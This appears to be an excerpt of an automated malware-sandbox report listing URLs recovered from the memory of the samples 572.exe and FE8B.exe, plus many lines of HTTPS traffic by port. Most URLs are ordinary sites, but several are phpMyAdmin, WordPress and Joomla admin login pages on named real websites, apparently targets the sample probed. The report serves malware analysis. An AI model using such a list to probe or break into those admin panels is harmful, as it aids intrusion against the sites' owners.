                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/tags/en/Massively%20Multiplayer/?snr=1_4_4__125
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/tags/en/RPG/?snr=1_4_4__125
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/tags/en/Racing/?snr=1_4_4__125
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/tags/en/Simulation/?snr=1_4_4__125
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/tags/en/Sports/?snr=1_4_4__125
                Source: 572.exe, 00000009.00000003.4390567048.0000000039177000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.casinocontroller.com/admin/istrator/index.php:
                Source: FE8B.exe, 00000007.00000003.2450711514.0000000001187000.00000004.00000020.00020000.00000000.sdmp, FE8B.exe, 00000007.00000003.2450496543.000000000118A000.00000004.00000020.00020000.00000000.sdmp, FE8B.exe, 00000007.00000002.2647046758.00000000010F8000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.3906194985.00000000640EC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4184636529.0000000047AB3000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4387562949.00000000403AE000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4072180672.0000000047B19000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4390567048.0000000039199000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304456912.0000000040090000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063DEC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4388544265.000000004012C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4072180672.0000000047B22000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4307098588.00000000061B3000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4513550067.000000004E073000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4513550067.000000004E067000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4163206048.000000004015F000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.00000000402AF000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4084235981.0000000040855000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
                Source: FE8B.exe, 00000007.00000003.2450711514.0000000001187000.00000004.00000020.00020000.00000000.sdmp, FE8B.exe, 00000007.00000002.2647046758.00000000010F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/ddos/glossary/malware/
                Source: 572.exe, 00000009.00000003.4298111023.00000000406D1000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.000000004029B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4390567048.0000000039128000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                Source: 572.exe, 00000009.00000003.4373730161.0000000063DEC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dragonbyte-tech.com/?utm_source=netizion.com&utm_campaign=site&utm_medium=footer&utm_con
                Source: 572.exe, 00000009.00000003.4373730161.0000000063DEC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dragonbyte-tech.com/store/categories/xenforo.5/?utm_source=netizion.com&utm_campaign=sit
                Source: 572.exe, 00000009.00000003.4373730161.0000000063DEC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dragonbyte-tech.com/store/details/?products=339
                Source: 572.exe, 00000009.00000003.4054751612.0000000040683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com
                Source: 572.exe, 00000009.00000003.4299205287.000000004061B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: 572.exe, 00000009.00000003.4054751612.0000000040683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
                Source: 572.exe, 00000009.00000003.4373730161.0000000063DEC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/
                Source: 572.exe, 00000009.00000003.4054751612.0000000040683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/js
                Source: 572.exe, 00000009.00000003.4308254495.00000000315C1000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E6B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/jsapi
                Source: 572.exe, 00000009.00000003.4054751612.0000000040683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                Source: 572.exe, 00000009.00000003.4097521546.0000000063AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/api.js?render=6LfZOoUUAAAAAIBHzCuLY_Gek6NbGm-ohefXhMx5
                Source: 572.exe, 00000009.00000003.4299205287.000000004061B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleadservices.com
                Source: 572.exe, 00000009.00000003.4054751612.0000000040683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
                Source: 572.exe, 00000009.00000003.4402104725.0000000063F8F000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063DEC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=G-BSTD50YB50
                Source: 572.exe, 00000009.00000003.4304769446.0000000040305000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4028547496.0000000047B3A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.3991523314.0000000040415000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=G-QZMBY25EVW
                Source: 572.exe, 00000009.00000003.4306089773.000000004E722000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=G-R4LNDD9YJ3
                Source: 572.exe, 00000009.00000003.4299205287.000000004061B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-142153722-1
                Source: 572.exe, 00000009.00000003.4304769446.0000000040305000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4028547496.0000000047B3A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.3991523314.0000000040415000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.3908338136.000000006417B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-152622256-1
                Source: 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4084235981.0000000040855000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-75635721-1
                Source: 572.exe, 00000009.00000003.4097521546.0000000063AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
                Source: 572.exe, 00000009.00000003.4097521546.0000000063AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-WMGQ2M
                Source: 572.exe, 00000009.00000003.4196885790.0000000047AF9000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4299205287.000000004061B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
                Source: 572.exe, 00000009.00000003.4054751612.0000000040683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/
                Source: 572.exe, 00000009.00000003.4196885790.0000000047AF9000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4299205287.000000004061B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                Source: 572.exe, 00000009.00000003.4298111023.000000004069A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.hero-wars.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004068B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.hero-wars.com/wp-login.php
                Source: 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.hero-wars.com/wp-login.php0
                Source: 572.exe, 00000009.00000003.4308489219.0000000006185000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.00000000406FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.hostgator.com.br
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.instagram.com/zoom/
                Source: 572.exe, 00000009.00000003.4523052924.000000004E07C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4309603552.000000004E5F3000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4390567048.0000000039148000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.kwyk.fr/administrator/index.php
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.linkedin.com/company/zoom-video-communications/
                Source: 572.exe, 00000009.00000003.4199132686.0000000039116000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4390567048.0000000039148000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4003323359.0000000039116000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.minecraft.net/
                Source: explorer.exe, 00000002.00000000.2122878030.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/10-things-rich-people-never-buy-and-you-shouldn-t-ei
                Source: explorer.exe, 00000002.00000000.2122878030.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA
                Source: explorer.exe, 00000002.00000000.2122878030.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-
                Source: explorer.exe, 00000002.00000000.2122878030.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/savingandinvesting/americans-average-net-worth-by-age/ar-AA1h4ngF
                Source: explorer.exe, 00000002.00000000.2122878030.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri
                Source: explorer.exe, 00000002.00000000.2122878030.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-
                Source: explorer.exe, 00000002.00000000.2122878030.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/republicans-already-barred-trump-from-being-speaker-of-the-h
                Source: explorer.exe, 00000002.00000000.2122878030.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/trump-campaign-says-he-raised-more-than-45-million-in-3rd-qu
                Source: explorer.exe, 00000002.00000000.2122878030.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nation
                Source: explorer.exe, 00000002.00000000.2122878030.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-c
                Source: explorer.exe, 00000002.00000000.2122878030.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
                Source: explorer.exe, 00000002.00000000.2122878030.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/us-supplies-ukraine-with-a-million-rounds-of-ammunition-seized-
                Source: explorer.exe, 00000002.00000000.2122878030.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of-
                Source: explorer.exe, 00000002.00000000.2122878030.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reve
                Source: explorer.exe, 00000002.00000000.2122878030.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
                Source: 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.phonandroid.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4054751612.0000000040683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.snapchat.com
                Source: 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4084235981.0000000040855000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.tiktok.com/
                Source: 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.tiktok.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.tiktok.com/phpmyadmin/.netL
                Source: 572.exe, 00000009.00000002.4626248458.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.torproject.org/documentation.html
                Source: 572.exe, 00000009.00000003.4054751612.000000004068B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.uh.is/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4097521546.0000000063AA0000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                Source: 572.exe, 00000009.00000003.4199007908.0000000040139000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.xn--72c1aelbgm0bc7d2cb0etac4cc5mdm2mra.com/administrator/
                Source: 572.exe, 00000009.00000003.4196885790.0000000047AF9000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4299205287.000000004061B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                Source: 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4196885790.0000000047AF9000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4299205287.000000004061B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4084235981.0000000040855000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                Source: 572.exe, 00000009.00000003.4184636529.0000000047AC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/canalcaixa
                Source: 572.exe, 00000009.00000003.4373730161.0000000063DEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/warriorplusvideo
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/zoommeetings
                Source: 572.exe, 00000009.00000003.4184636529.0000000047AC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www1.caixa.gov.br//rss/index.asp
                Source: 572.exe, 00000009.00000003.4184636529.0000000047AC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www1.caixa.gov.br/atendimento/telefones_da_caixa.asp
                Source: 572.exe, 00000009.00000003.4184636529.0000000047AC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www1.caixa.gov.br/idiomas/espanhol/index.asp
                Source: 572.exe, 00000009.00000003.4184636529.0000000047AC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www1.caixa.gov.br/idiomas/ingles/index.asp
                Source: 572.exe, 00000009.00000003.4184636529.0000000047AC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www1.caixa.gov.br/imprensa/index.asp
                Source: 572.exe, 00000009.00000003.4184636529.0000000047AC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www1.caixa.gov.br/ouvidoria/index.asp
                Source: 572.exe, 00000009.00000003.4184636529.0000000047AC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www3.caixa.gov.br/fies/
                Source: 572.exe, 00000009.00000003.4373730161.0000000063DEC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xenforo.com
                Source: 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xn--72c1aelbgm0bc7d2cb0etac4cc5mdm2mra.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xsaniime.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4298111023.000000004069A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yellosa.co.za/administrator/
                Source: 572.exe, 00000009.00000003.4307717822.000000000598E000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4579113128.0000000005658000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yellosa.co.za/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yellosa.co.za/phpmyadmin/7C
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yellosa.co.za/phpmyadmin/cx
                Source: 572.exe, 00000009.00000003.4084235981.0000000040855000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zarkana2.ro/
                Source: 572.exe, 00000009.00000003.4304769446.0000000040257000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4390567048.0000000039148000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4337138614.000000004DACD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zarkana2.ro/administrator/
                Source: 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4084235981.0000000040855000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zarkana2.ro/cookie
                Source: 572.exe, 00000009.00000003.4199007908.0000000040148000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4084235981.0000000040855000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zarkana2.ro/images/favicon.png
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zoomcares.zoom.us
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55162
                Source: unknownNetwork traffic detected: HTTP traffic on port 56618 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56010
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50708
                Source: unknownNetwork traffic detected: HTTP traffic on port 56811 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50709
                Source: unknownNetwork traffic detected: HTTP traffic on port 63415 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 54620 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                Source: unknownNetwork traffic detected: HTTP traffic on port 63394 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55175
                Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55176
                Source: unknownNetwork traffic detected: HTTP traffic on port 56240 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55173
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                Source: unknownNetwork traffic detected: HTTP traffic on port 55257 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 52516 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55186
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55187
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55189
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55183
                Source: unknownNetwork traffic detected: HTTP traffic on port 63977 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55185
                Source: unknownNetwork traffic detected: HTTP traffic on port 57839 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 65348 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52516
                Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63890
                Source: unknownNetwork traffic detected: HTTP traffic on port 56099 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 56001 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 56695 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 65137 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63406
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63409
                Source: unknownNetwork traffic detected: HTTP traffic on port 63116 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63645
                Source: unknownNetwork traffic detected: HTTP traffic on port 63695 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51437
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54708
                Source: unknownNetwork traffic detected: HTTP traffic on port 63890 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 56546 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 63700 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50102
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52524
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50104
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51433
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50103
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63416
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63415
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63410
                Source: unknownNetwork traffic detected: HTTP traffic on port 63392 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63414
                Source: unknownNetwork traffic detected: HTTP traffic on port 63449 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50113
                Source: unknownNetwork traffic detected: HTTP traffic on port 64053 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50354
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54710
                Source: unknownNetwork traffic detected: HTTP traffic on port 65264 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50114
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63427
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63426
                Source: unknownNetwork traffic detected: HTTP traffic on port 55838 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 55712 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 56391 -> 443
